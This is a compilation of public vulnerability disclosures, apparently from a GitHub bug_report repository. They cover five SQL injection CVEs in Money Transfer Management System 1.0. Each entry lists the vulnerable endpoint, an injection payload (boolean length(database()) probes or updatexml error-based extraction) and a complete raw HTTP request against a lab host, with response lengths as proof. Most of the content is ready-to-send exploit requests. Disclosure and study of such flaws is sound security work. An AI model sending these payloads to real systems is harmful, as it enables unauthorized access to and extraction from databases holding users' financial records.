Money Transfer Management System 1.0 is vulnerable to SQL Injection via /mtms/admin/?page=transaction/send&id=, id.

**Money Transfer Management System v1.0 by oretnom23 has SQL injection**

**Author：** k0xx

vendors: https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html

Vulnerability File: /mtms/admin/?page=transaction/send&id=

Vulnerability location: /mtms/admin/?page=transaction/send&id=, id

\[+\] Payload: /mtms/admin/?page=transaction/send&id=1%27%20and%20length(database())%20=7%20--+ // Leak place ---> id

Current database name: mtms\_db,length is 7

GET /mtms/admin/?page\=transaction/send&id\=1%27%20and%20length(database())%20\=7%20\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bnvs2lhahed1884v0nf12nt52s
Connection: close
// Leak place ---> id

When length (database ()) = 7, Content-Length: 33302 

When length (database ()) = 8, Content-Length: 33339

CVE-2022-29738: bug_report/SQLi-2.md at main · k0xx11/bug_report

Money Transfer Management System 1.0 is vulnerable to SQL Injection via /mtms/admin/?page=user/manage_user&id=.

**Money Transfer Management System v1.0 by oretnom23 has SQL injection**

**Author：** k0xx

vendors: https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html

Vulnerability File: /mtms/admin/?page=user/manage\_user&id=

Vulnerability location: /mtms/admin/?page=user/manage\_user&id=,id

\[+\] Payload: /mtms/admin/?page=user/manage\_user&id=1%27%20and%20length(database())%20=%207--+ // Leak place ---> id

Current database name: mtms\_db,length is 7

GET /mtms/admin/?page\=user/manage\_user&id\=1%27%20and%20length(database())%20\=%207\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bnvs2lhahed1884v0nf12nt52s
Connection: close
// Leak place ---> id

When length (database ()) = 7, Content-Length: 27338 

When length (database ()) = 8, Content-Length: 27482

CVE-2022-29739: bug_report/SQLi-3.md at main · k0xx11/bug_report

Money Transfer Management System 1.0 is vulnerable to SQL Injection via \mtms\classes\Master.php?f=delete_fee.

Permalink

Cannot retrieve contributors at this time

**Money Transfer Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html

Vulnerability File: \\mtms\\classes\\Master.php?f=delete\_fee

Vulnerability location: /mtms/classes/Master.php?f=delete\_fee, id

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /mtms/classes/Master.php?f\=delete\_fee HTTP/1.1
Host: 192.168.1.19
Content\-Length: 65
Accept: application/json, text/javascript, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.19
Referer: http://192.168.1.19/mtms/admin/?page=maintenance/fee
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bnvs2lhahed1884v0nf12nt52s
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

CVE-2022-29741: bug_report/SQLi-4.md at main · k0xx11/bug_report

Money Transfer Management System 1.0 is vulnerable to SQL Injection via \mtms\classes\Master.php?f=delete_transaction.

Permalink

Cannot retrieve contributors at this time

**Money Transfer Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html

Vulnerability File: \\mtms\\classes\\Master.php?f=delete\_transaction

Vulnerability location: /mtms/classes/Master.php?f=delete\_transaction, id

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /mtms/classes/Master.php?f\=delete\_transaction HTTP/1.1
Host: 192.168.1.19
Content\-Length: 65
Accept: application/json, text/javascript, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.19
Referer: http://192.168.1.19/mtms/admin/?page=transaction
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bnvs2lhahed1884v0nf12nt52s
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

CVE-2022-29745: bug_report/SQLi-5.md at main · k0xx11/bug_report

Money Transfer Management System 1.0 is vulnerable to SQL Injection via /mtms/classes/Users.php?f=delete.

Permalink

Cannot retrieve contributors at this time

**Money Transfer Management System v1.0 by oretnom23 has SQL injection**

**Author：** k0xx

vendors: https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html

Vulnerability File: /mtms/classes/Users.php?f=delete

Vulnerability location: /mtms/classes/Users.php?f=delete,id

\[+\] Payload: id=2' and length(database()) =7 --+ // Leak place ---> id

Current database name: mtms\_db,length is 7

POST /mtms/classes/Users.php?f\=delete HTTP/1.1
Host: 192.168.1.19
Content\-Length: 35
Accept: application/json, text/javascript, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.19
Referer: http://192.168.1.19/mtms/admin/?page=user/list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bnvs2lhahed1884v0nf12nt52s
Connection: close
id=2' and length(database()) =7 --+ // Leak place ---> id

When length (database ()) = 7, Content-Length: 19 

When length (database ()) = 8, Content-Length: 169

Tag

#webkit